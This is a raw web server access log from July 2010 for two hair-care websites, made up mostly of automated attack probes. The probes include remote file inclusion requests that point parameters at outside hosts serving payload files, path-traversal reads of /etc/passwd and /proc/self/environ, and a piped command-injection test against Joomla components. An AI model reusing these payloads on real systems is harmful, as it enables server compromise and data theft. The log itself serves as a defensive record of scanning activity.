67.195.114.60 - - [12/Jul/2010:00:27:58 -0700] "GET /logs/access_100517.log HTTP/1.0" 200 3119686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
64.202.115.179 - - [12/Jul/2010:00:29:25 -0700] "GET /option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.202.115.179 - - [12/Jul/2010:00:29:26 -0700] "GET /logs//option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.202.115.179 - - [12/Jul/2010:00:29:26 -0700] "GET /logs/access_100503.log%20%20//option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.202.115.179 - - [12/Jul/2010:00:29:29 -0700] "GET /option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.202.115.179 - - [12/Jul/2010:00:29:29 -0700] "GET /logs//option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.202.115.179 - - [12/Jul/2010:00:29:31 -0700] "GET /logs/access_100503.log%20%20//option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.202.115.179 - - [12/Jul/2010:00:31:16 -0700] "GET /logs/access_100412.log%20%20//option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.202.115.179 - - [12/Jul/2010:00:31:30 -0700] "GET /logs/access_100412.log%20%20//option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.5.163.206 - - [12/Jul/2010:00:32:43 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alghadeer.org//administrator/templates/system/html/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.freehairsecrets.com"
195.5.163.206 - - [12/Jul/2010:00:32:43 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alghadeer.org//administrator/templates/system/html/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.freehairsecrets.com"
195.5.163.206 - - [12/Jul/2010:00:32:44 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alghadeer.org//administrator/templates/system/html/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.freehairsecrets.com"
64.202.115.179 - - [12/Jul/2010:00:33:12 -0700] "GET /logs/access.log%20%20//option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.202.115.179 - - [12/Jul/2010:00:33:12 -0700] "GET /logs//option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.202.115.179 - - [12/Jul/2010:00:33:14 -0700] "GET /option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.202.115.179 - - [12/Jul/2010:00:33:40 -0700] "GET /logs//option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.202.115.179 - - [12/Jul/2010:00:33:40 -0700] "GET /logs/access.log%20%20//option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.202.115.179 - - [12/Jul/2010:00:33:41 -0700] "GET /option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.202.115.179 - - [12/Jul/2010:00:34:18 -0700] "GET /logs/access_100503.log//option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.202.115.179 - - [12/Jul/2010:00:35:13 -0700] "GET /logs/access_100412.log//option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.202.115.179 - - [12/Jul/2010:00:35:19 -0700] "GET /logs/access_100503.log//option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.136.63.119 - - [12/Jul/2010:00:35:23 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
119.254.229.63 - - [12/Jul/2010:00:35:36 -0700] "GET /nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.254.229.63 - - [12/Jul/2010:00:35:36 -0700] "GET /logs/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.254.229.63 - - [12/Jul/2010:00:35:36 -0700] "GET /logs/access_100215.log%20%20/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.233.172.20 - - [12/Jul/2010:00:35:43 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15728 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Wireless Transcoder) Version/3.1 Safari/525.13" "growlonghairfast.com"
195.5.163.206 - - [12/Jul/2010:00:35:46 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alghadeer.org//administrator/templates/system/html/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.freehairsecrets.com"
195.5.163.206 - - [12/Jul/2010:00:35:46 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alghadeer.org//administrator/templates/system/html/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.freehairsecrets.com"
195.5.163.206 - - [12/Jul/2010:00:35:46 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.alghadeer.org//administrator/templates/system/html/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.freehairsecrets.com"
119.254.229.63 - - [12/Jul/2010:00:35:47 -0700] "GET /nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.254.229.63 - - [12/Jul/2010:00:35:47 -0700] "GET /logs/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.254.229.63 - - [12/Jul/2010:00:35:47 -0700] "GET /logs/access_100215.log%20%20/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.202.115.179 - - [12/Jul/2010:00:36:05 -0700] "GET /logs/access_100412.log//option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
90.183.39.17 - - [12/Jul/2010:00:36:28 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "holmes/3.12.4 (http://morfeo.centrum.cz/bot)" "freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:00:36:50 -0700] "GET /logs/access_100628.log%20%20/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:00:36:50 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 4942 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:00:36:51 -0700] "GET /logs/access_100628.log%20%20/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:00:36:51 -0700] "GET /?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:00:36:51 -0700] "GET /logs/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 4942 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:00:36:51 -0700] "GET /?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:00:37:05 -0700] "GET /?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:00:37:05 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 4942 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:00:37:05 -0700] "GET /logs/access_100628.log/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:00:37:06 -0700] "GET /?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:00:37:06 -0700] "GET /logs/access_100628.log/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:00:37:06 -0700] "GET /logs/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 4942 "-" "MaMa CaSpEr" "growlonghairfast.com"
94.136.63.119 - - [12/Jul/2010:00:37:08 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:00:37:18 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "growlonghairfast.com"
64.202.115.179 - - [12/Jul/2010:00:39:02 -0700] "GET /logs/access.log//option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.142.75.205 - - [12/Jul/2010:00:39:02 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.142.75.205 - - [12/Jul/2010:00:39:02 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
64.202.115.179 - - [12/Jul/2010:00:40:06 -0700] "GET /logs/access.log//option,com_sitemap/Itemid,103//?mosConfig_absolute_path=http://www.th-design.ch/24h/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.136.63.119 - - [12/Jul/2010:00:40:45 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.136.63.119 - - [12/Jul/2010:00:44:25 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
89.107.17.204 - - [12/Jul/2010:00:44:53 -0700] "GET /logs/access_100628.log///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.edu../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:44:53 -0700] "GET //index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.edu../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:44:53 -0700] "GET /logs///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.edu../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:46:10 -0700] "GET /logs/access_100628.log///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.com.tr../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:46:11 -0700] "GET //index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.com.tr../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:46:11 -0700] "GET /logs///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.com.tr../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.142.75.205 - - [12/Jul/2010:00:46:15 -0700] "GET /logs/access_100614.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.142.75.205 - - [12/Jul/2010:00:46:15 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.142.75.205 - - [12/Jul/2010:00:46:18 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:46:37 -0700] "GET /logs/access_100705.log///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.gov../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:46:38 -0700] "GET //index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.gov../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:46:39 -0700] "GET /logs///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.gov../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:46:47 -0700] "GET /logs/access.log///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.gov../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.107.17.204 - - [12/Jul/2010:00:46:48 -0700] "GET //index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.gov../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.107.17.204 - - [12/Jul/2010:00:46:49 -0700] "GET /logs///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.gov../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.107.17.204 - - [12/Jul/2010:00:48:31 -0700] "GET /logs/access_100628.log///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.org../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:48:32 -0700] "GET //index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.org../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:48:33 -0700] "GET /logs///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.org../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:48:42 -0700] "GET /logs/access_100705.log///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.com.br../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:48:43 -0700] "GET //index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.com.br../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:48:44 -0700] "GET /logs///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.com.br../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:49:14 -0700] "GET /logs/access.log///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.edu../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.107.17.204 - - [12/Jul/2010:00:49:15 -0700] "GET //index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.edu../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.107.17.204 - - [12/Jul/2010:00:49:15 -0700] "GET /logs///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.edu../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.107.17.204 - - [12/Jul/2010:00:49:22 -0700] "GET /logs/access.log///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.com.br../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.107.17.204 - - [12/Jul/2010:00:49:23 -0700] "GET //index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.com.br../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.107.17.204 - - [12/Jul/2010:00:49:24 -0700] "GET /logs///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.com.br../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.107.17.204 - - [12/Jul/2010:00:49:46 -0700] "GET /logs/access_100705.log///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.edu../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:50:15 -0700] "GET /logs/access.log///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.org../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.107.17.204 - - [12/Jul/2010:00:50:16 -0700] "GET //index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.org../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.107.17.204 - - [12/Jul/2010:00:50:17 -0700] "GET /logs///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.org../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:00:50:45 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "growlonghairfast.com"
89.107.17.204 - - [12/Jul/2010:00:50:46 -0700] "GET /logs/access_100705.log///index.php?option=com_alphauserpoints&controller=%20%22com_alphauserpoints%22%20.org../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
94.136.63.119 - - [12/Jul/2010:00:50:54 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.136.63.119 - - [12/Jul/2010:00:52:00 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.136.63.119 - - [12/Jul/2010:00:52:19 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
118.69.206.77 - - [12/Jul/2010:00:53:32 -0700] "GET /logs/access_100628.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
118.69.206.77 - - [12/Jul/2010:00:53:33 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
118.69.206.77 - - [12/Jul/2010:00:53:33 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:00:54:18 -0700] "GET /logs/access_100301.log HTTP/1.0" 200 2120251 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
88.214.192.30 - - [12/Jul/2010:01:00:34 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
213.232.94.135 - - [12/Jul/2010:01:02:10 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
213.232.94.135 - - [12/Jul/2010:01:02:10 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
213.232.94.135 - - [12/Jul/2010:01:02:48 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.232.94.135 - - [12/Jul/2010:01:02:50 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:01:03:55 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "growlonghairfast.com"
88.214.192.30 - - [12/Jul/2010:01:08:23 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
112.105.117.85 - - [12/Jul/2010:01:08:41 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 851968 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
64.131.83.162 - - [12/Jul/2010:01:08:43 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
91.198.106.32 - - [12/Jul/2010:01:08:45 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "growlonghairfast.com"
112.105.117.85 - - [12/Jul/2010:01:08:46 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 983040 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
88.80.209.57 - - [12/Jul/2010:01:12:26 -0700] "GET /logs/access_100111.log/error.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:12:26 -0700] "GET /logs/error.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:12:26 -0700] "GET /logs/access_100322.log/error.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:12:26 -0700] "GET /error.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:12:27 -0700] "GET /error.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:12:27 -0700] "GET /logs/error.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:12:27 -0700] "GET /logs/access_100322.log/error.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:12:27 -0700] "GET /logs/access_100111.log/error.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
